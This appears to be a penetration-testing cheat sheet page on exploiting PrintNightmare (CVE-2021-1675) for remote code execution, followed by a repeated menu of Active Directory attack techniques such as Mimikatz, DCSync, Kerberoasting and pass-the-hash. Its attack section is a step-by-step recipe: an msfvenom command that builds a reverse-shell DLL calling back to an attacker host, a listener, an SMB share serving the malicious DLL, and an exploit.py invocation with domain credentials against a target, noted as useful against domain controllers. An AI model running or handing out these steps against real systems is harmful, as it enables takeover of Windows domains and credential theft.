PrintNightmare (Internal/External)

Remote Code Execution

https://github.com/cube0x0/CVE-2021-1675

Contains full details on scanning and mitigation. Could potentially be used against a domain controller for easy access to a reverse shell.

Create payload

msfvenom -p <payload> LHOST=<kali-ip> LPORT=<port> -f dll -o file.dll

Start a listener

Could be netcat or metasploit multi-handler

Start an SMB server to host the malicious DLL

sudo smbserver.py share $PWD -smb2support

Run the exploit per the GitHub documentation

exploit.py domain/user:password@target-ip-address 'malicious.dll'

Enumerating Hosts and Identifying the Domain Controllers

LLMNR Poisoning (Internal)

SMB Relay (Internal/External)

IPv6 DNS Spoofing (Internal)

NULL Session Enumeration (Internal/External)

Using Faketime for Ad-Hoc Kerberos Authentication

Kerberos Pre-Auth Username Enumeration

AS-REP Roasting (Internal/External)

Passback Attacks (Internal/External)

PrintNightmare (Internal/External)

NTLM Credential Stuffing (Internal/External)

PowerShell AD Module on Any Domain Host as Any User

Dumping DNS Records with adidnsdump

CrackMapExec

PowerView

BloodHound

Remote Bloodhound

LdapDomainDump

LdapSearch

Enum4Linux

GetADUsers.py

GetUserSPNs.py

Manual Enumeration

Extracting Kerberos AS-REQ Pre-Auth Hashes from PCAPs

Mimikatz

Dumping Passwords from Windows Credential Manager

Dumping Hashes without Mimikatz

Impacket-Addcomputer

DCSync

Pass the Password

Pass the Hash

Pass the Ticket

Pass the Key

Password & Credential Brute Force

Token Impersonation

Spawn Processes as Other Users

Kerberoasting

Group Policy Preferences (GPP)

PrintNightmare

ZeroLogon

xfreerdp

PrintNightmare (Internal/External)

Remote Code Execution

Create payload

Start a listener

Start an SMB server to host the malicious DLL

Run the exploit per the GitHub documentation